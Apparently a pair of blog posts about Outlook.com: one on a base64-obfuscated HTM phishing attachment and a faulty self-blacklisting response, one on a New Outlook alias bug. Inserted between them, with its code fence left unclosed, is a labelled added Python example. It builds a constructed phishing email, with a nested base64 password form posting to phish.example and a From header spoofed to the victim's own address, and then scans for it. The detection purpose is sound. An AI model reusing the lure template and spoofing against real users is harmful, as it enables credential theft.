Outlook team, can you fix this?

I am getting this phishing email with an HTM attachment, BASE64 encoded of course, which in turn contains a web form, with all assets and parts BASE64 encoded. The form attempts to phish my password.

The Outlook.com spam filter does not recognize this blatant phish and delivers it as a legitimate email. I chose to report this phishing attempt so that Outlook.com recognizes such emails in the future.

Outlook chooses to put the sender on the blacklist and does not recognize that the FROM address contains my own mail address. If I had not checked the source of this mail, I would not even be aware that I am now unable to send myself documents.

Team, this is your fix list:

  • BASE64 is not rocket science, and the HTM file makes it blatantly obvious that it tries to steal passwords. This should be the easiest quarantine target out there if you take security seriously.
  • Blacklisting your own email address should really not be in the tool chest of a mail client, should it?
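
Both points on the fix list are mechanical checks. The following is an added example, not code from the post or from Microsoft: it builds a constructed sample message that mirrors the description above (a base64-encoded .htm attachment whose body hides a credential form inside a base64 data: URI, with a From header spoofed to the victim's own address), peels the base64 layers off the attachment to find the password field, and computes which sender addresses a "report phishing" action may block after excluding the user's own aliases. The function names `find_credential_forms` and `blockable_senders`, the file name `Document.htm` and the addresses are assumptions for the example.

```python
import base64
import email
import re
from email import policy
from email.message import EmailMessage

# Constructed sample (not the real phish): a credential form, wrapped in a
# base64 data: URI inside an .htm file, which is itself sent as a base64
# encoded attachment. The From header is spoofed to the victim's own address.
INNER_FORM = (
    b'<html><body><form method="post" action="https://phish.example/collect">'
    b'<input type="email" name="login">'
    b'<input type="password" name="passwd">'
    b'<input type="submit" value="Sign in"></form></body></html>'
)
OUTER_HTM = (
    b'<html><body><iframe src="data:text/html;base64,'
    + base64.b64encode(INNER_FORM)
    + b'"></iframe></body></html>'
)


def build_sample_eml(victim: str) -> bytes:
    """Assemble the constructed phishing message as raw RFC 5322 bytes."""
    msg = EmailMessage()
    msg["From"] = f"Mail Admin <{victim}>"   # spoofed: the victim's own address
    msg["To"] = victim
    msg["Subject"] = "Your mailbox will be closed"
    msg.set_content("See the attached document.")
    # bytes content is transfer-encoded as base64 by default
    msg.add_attachment(OUTER_HTM, maintype="text", subtype="html",
                       filename="Document.htm")
    return msg.as_bytes()


# Base64 hidden inside HTML: data: URIs and atob("...") calls in inline script.
DATA_URI = re.compile(rb"data:[\w/.+-]+;base64,([A-Za-z0-9+/=]+)", re.I)
ATOB_CALL = re.compile(rb"atob\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.I)
PASSWORD_INPUT = re.compile(rb"<input[^>]*type\s*=\s*['\"]?password", re.I)


def unwrap_base64(blob: bytes, max_depth: int = 5) -> list[bytes]:
    """Return the blob plus every base64 payload nested inside it, breadth-first,
    stopping at max_depth so a decoding bomb cannot run the scanner forever."""
    layers, frontier = [blob], [blob]
    for _ in range(max_depth):
        decoded = []
        for chunk in frontier:
            for pattern in (DATA_URI, ATOB_CALL):
                for match in pattern.finditer(chunk):
                    try:
                        decoded.append(base64.b64decode(match.group(1), validate=True))
                    except ValueError:   # not real base64 (binascii.Error is a ValueError)
                        continue
        if not decoded:
            break
        layers.extend(decoded)
        frontier = decoded
    return layers


def find_credential_forms(raw_eml: bytes) -> list[str]:
    """Names of .htm/.html attachments containing a password field at any
    base64 nesting level."""
    msg = email.message_from_bytes(raw_eml, policy=policy.default)
    flagged = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        if not name.lower().endswith((".htm", ".html")):
            continue
        body = part.get_payload(decode=True) or b""   # undoes the attachment's base64 CTE
        if any(PASSWORD_INPUT.search(layer) for layer in unwrap_base64(body)):
            flagged.append(name)
    return flagged


def blockable_senders(raw_eml: bytes, own_addresses: set[str]) -> set[str]:
    """Sender addresses a 'report phishing' action may add to the block list:
    everything in From/Sender/Reply-To except the user's own aliases."""
    own = {a.lower() for a in own_addresses}
    msg = email.message_from_bytes(raw_eml, policy=policy.default)
    seen = set()
    for header in ("From", "Sender", "Reply-To"):
        for h in msg.get_all(header, []):
            seen.update(a.addr_spec.lower() for a in h.addresses)
    return seen - own


if __name__ == "__main__":
    raw = build_sample_eml("victim@example.com")
    print(find_credential_forms(raw))                        # ['Document.htm']
    print(blockable_senders(raw, {"victim@example.com"}))    # set(): nothing safe to block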

Update: I received helpful feedback from Microsoft on this issue. Safe Sender overrode spam detection in this case. Teams are working on both how to modernize this space more holistically and how to fix the anti-phishing gap.

Showstopper bug in New Outlook with Outlook.com

Microsoft is pushing the New Outlook app to Windows 11. It is replacing the old Mail & Calendar apps. However, I am unable to use this app with my Outlook.com account. And so are many others.

I have narrowed down the problem to a simple root cause: if you have set your personal mail address as your primary alias, you cannot add your Outlook.com account to New Outlook. It fails with both your personal email address and your Outlook.com address.

Only if you set your Outlook.com address as your primary alias can you add the account, but after that you cannot send mail from your personal email alias. Catch-22. Be extra careful when you do change your primary alias: you can only do that twice a week.

This bug is only in New Outlook and it only affects Outlook.com accounts. You can use Gmail accounts just fine. And you can use your personal email as primary alias in all other Microsoft apps, including Outlook on iOS and Outlook on Android, and the Outlook.com PWA.

I think it is quite hilarious that Microsoft only fails with the combination Windows + Outlook + Outlook.com. Let’s have a good laugh and then fix it.